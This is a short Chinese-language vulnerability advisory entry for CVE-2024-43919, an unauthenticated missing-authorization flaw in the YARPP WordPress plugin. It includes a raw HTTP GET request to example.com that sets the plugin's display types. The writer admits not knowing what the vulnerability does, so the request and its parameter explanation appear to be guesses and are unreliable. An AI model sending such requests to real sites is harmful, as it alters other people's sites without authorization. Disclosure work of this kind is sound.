YARPP <= 5.30.10 - 缺少授权
WordPress 的 YARPP – Yet Another Related Posts Plugin 插件由于在 ~/includes/yarpp_pro_set_display_types.php 文件中缺少权限检查,导致存在未授权访问漏洞,影响版本包括 5.30.10 及之前的所有版本。这使得未经身份验证的攻击者能够设置显示类型。
Type: plugin
CVSS Score: 5.3
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
CVE: CVE-2024-43919
Slug: yet-another-related-posts-plugin
完全不知道这个漏洞具体做什么。
以下是一个利用 YARPP 插件漏洞的原始 HTTP 请求示例:
GET /wp-content/plugins/yet-another-related-posts-plugin/includes/yarpp_pro_set_display_types.php?ypsdt=false&types[]=post&types[]=page HTTP/1.1
Host: example.com
在此请求中:
ypsdt 参数设置为 false 以绕过代码中的初始检查。types[] 参数用于指定要设置的显示类型。在此示例中,传递了 post 和 page 作为类型。Host 头部指定了托管易受攻击的 YARPP 插件的目标 WordPress 站点。当此请求发送到安装有易受攻击版本的 YARPP 插件的 WordPress 站点时,它将无需任何身份验证或授权即可设置显示类型。